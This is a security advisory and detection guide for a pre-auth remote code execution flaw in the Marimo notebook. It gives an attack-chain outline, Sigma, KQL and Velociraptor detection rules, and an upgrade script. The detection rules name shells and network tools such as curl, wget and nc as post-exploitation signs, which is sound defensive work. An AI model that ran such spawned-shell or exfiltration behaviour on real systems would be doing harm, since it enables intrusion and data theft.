CVE-2026-39987: Marimo Pre-Auth RCE — Detection and Remediation Guide

Executive Summary: A critical security vulnerability (CVE-2026-39987) has been identified in Marimo, an open-source reactive notebook for Python. Rated CVSS 9.3 (Critical), this pre-authenticated Remote Code Execution (RCE) flaw allows unauthenticated attackers to execute arbitrary code on the host system. According to Sysdig, active exploitation began within 10 hours of public disclosure. Given the high-value nature of data science environments often running with elevated privileges, this represents an immediate and severe threat to infrastructure integrity.

Introduction

For data science and engineering teams, tools like Marimo are essential for interactive analysis. However, these same tools often become prime targets for initial access brokers. The disclosure of CVE-2026-39987 is alarming not just due to its severity, but the velocity of weaponization.

This is not a theoretical risk. The vulnerability bypasses authentication entirely, meaning any exposed Marimo endpoint is a potential open door for threat actors to deploy ransomware, conduct supply-chain attacks, or exfiltrate proprietary models and datasets. Defenders must assume that scanning and exploitation attempts are already active against public-facing instances.

Technical Analysis

• Affected Product: Marimo (Open-source Python notebook)
• CVE Identifier: CVE-2026-39987
• CVSS Score: 9.3 (Critical)
• Affected Versions: All versions prior to the latest patched release (Check official advisory for specific fixed build).
• Vulnerability Type: Pre-authenticated Unauthenticated Remote Code Execution (RCE).

How the Exploit Works: The vulnerability exists in the way Marimo handles specific requests to its server interface. By sending a specially crafted malicious request to the target endpoint, an attacker can trigger a deserialization flaw or input validation error that leads to arbitrary code execution.

Attack Chain:

1. Discovery: Attacker scans for Marimo instances (default port 2718 or exposed web paths).
2. Exploitation: Attacker sends malicious payload to the vulnerable endpoint without providing credentials.
3. Execution: The Marimo Python process executes the attacker's code, typically spawning a reverse shell or downloading a webshell.
4. Post-Exploitation: Attacker establishes persistence, moves laterally, or steals data.

Exploitation Status: CONFIRMED ACTIVE EXPLOITATION. Security researchers observed exploitation in the wild (ITW) within 10 hours of the initial public disclosure. PoC (Proof of Concept) code is likely publicly available.

Detection & Response

Given the speed of exploitation, network-based detection may be too slow if the inbound traffic looks like standard HTTP. We must rely on endpoint telemetry to detect the abnormal process execution resulting from the exploit.

The following Sigma rules, KQL queries, and VQL artifacts are designed to detect the effect of the exploit: the Python/Marimo process spawning unauthorized child processes (shells) or network utilities.

Sigma Rules

---
title: Potential Marimo RCE - Python Spawning Shell
id: 8a4b3c2d-1e9f-4a5b-bc6d-7e8f9a0b1c2d
status: experimental
description: Detects the Marimo application (running via Python) spawning a shell, a strong indicator of successful RCE exploitation of CVE-2026-39987.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/python'
    ParentCommandLine|contains: 'marimo'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
  condition: selection
falsepositives:
  - Legitimate administrative debugging by data scientists (rare in production notebooks)
level: critical
---
title: Potential Marimo RCE - Spawning Network Utilities
id: 9b5c4d3e-2f0a-5b6c-cd7e-8f9a0b1c2d3e
status: experimental
description: Detects the Marimo application spawning curl, wget, or nc, often used for beaconing or data exfiltration post-exploitation.
references:
  - https://thehackernews.com/2026/04/marimo-rce-flaw-cve-2026-39987.html
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/python'
    ParentCommandLine|contains: 'marimo'
    Image|endswith:
      - '/curl'
      - '/wget'
      - '/nc'
      - '/netcat'
  condition: selection
falsepositives:
  - Legitimate data fetching workflows (validate against known user behavior)
level: high


**Microsoft Sentinel / Defender KQL**

// Hunt for Marimo RCE Activity
// Looks for Python processes identified as Marimo spawning suspicious child processes
DeviceProcessEvents
| where Timestamp > ago(1d)
| where InitiatingProcessFileName in~ ("python", "python3", "uwsgi", "gunicorn") 
| where InitiatingProcessCommandLine contains "marimo"
| where FileName in~ ("bash", "sh", "zsh", "curl", "wget", "nc", "python") // Note: Python spawning python is common in notebooks, but shell/net tools are high risk
| where FileName !in~ ("python", "python3") // Filter out normal notebook execution unless you want to see script chaining
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, FileName, ProcessCommandLine


**Velociraptor VQL**

-- Hunt for Marimo RCE Indicators
-- Select processes where a Python process (Marimo) spawns a shell or network tool
SELECT Pid, Name, CommandLine, Exe, Username, CreateTime,
       Parent.Name AS ParentName, Parent.CommandLine AS ParentCmd
FROM pslist()
WHERE Parent.Name =~ "python"
  AND Parent.CmdLine =~ "marimo"
  AND Name =~ "bash|sh|zsh|curl|wget|nc"


**Remediation Script (Bash)**

#!/bin/bash
# Remediation script for CVE-2026-39987 (Marimo RCE)
# This script checks the Marimo version and attempts to upgrade to the latest patched version.

# Check if Marimo is installed via pip
if ! command -v marimo &> /dev/null; then
    echo "[-] Marimo binary not found in PATH. Checking pip list..."
    if ! pip show marimo &> /dev/null; then
        echo "[-] Marimo not installed. Exiting."
        exit 0
    fi
fi

CURRENT_VERSION=$(pip show marimo | grep Version | awk '{print $2}')
echo "[+] Current Marimo version detected: $CURRENT_VERSION"

echo "[!] Vulnerability CVE-2026-39987 (CVSS 9.3) is a critical pre-auth RCE."
echo "[*] Attempting to upgrade Marimo to the latest patched version..."

# Upgrade Marimo
pip install --upgrade marimo

# Verify upgrade
UPGRADED_VERSION=$(pip show marimo | grep Version | awk '{print $2}')
echo "[+] Post-upgrade Marimo version: $UPGRADED_VERSION"

if [ "$CURRENT_VERSION" != "$UPGRADED_VERSION" ]; then
    echo "[+] Upgrade successful."
    echo "[ACTION REQUIRED] Restart all Marimo servers/notebooks immediately to apply the patch."
else
    echo "[*] Version unchanged or already up to date. Please verify manually against the vendor advisory."
fi

Remediation

1. Patch Immediately: Apply the latest security update released by the Marimo team. Do not delay. Since active exploitation is confirmed, treat this as an active incident.

2. Update Command: Run the following command in your environment where Marimo is installed: pip install --upgrade marimo

3. Restart Services: Simply updating the package is not enough if the process is still running in memory. You must restart the Marimo server/notebook instances to load the patched code.

4. Network Segmentation: Marimo instances should not be exposed directly to the public internet. Place them behind a VPN, Zero Trust Network Access (ZTNA) solution, or an authenticated reverse proxy (e.g., Nginx, OAuth2 Proxy) to prevent direct unauthenticated access to port 2718.

5. Compromise Assessment: If your Marimo instances were exposed to the internet prior to patching, assume compromise. Initiate a forensic review of logs for the process creation anomalies detailed in the Detection section above.

Official Vendor Advisory: Check the Marimo GitHub Repository or PyPI for the specific patched version number and release notes.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub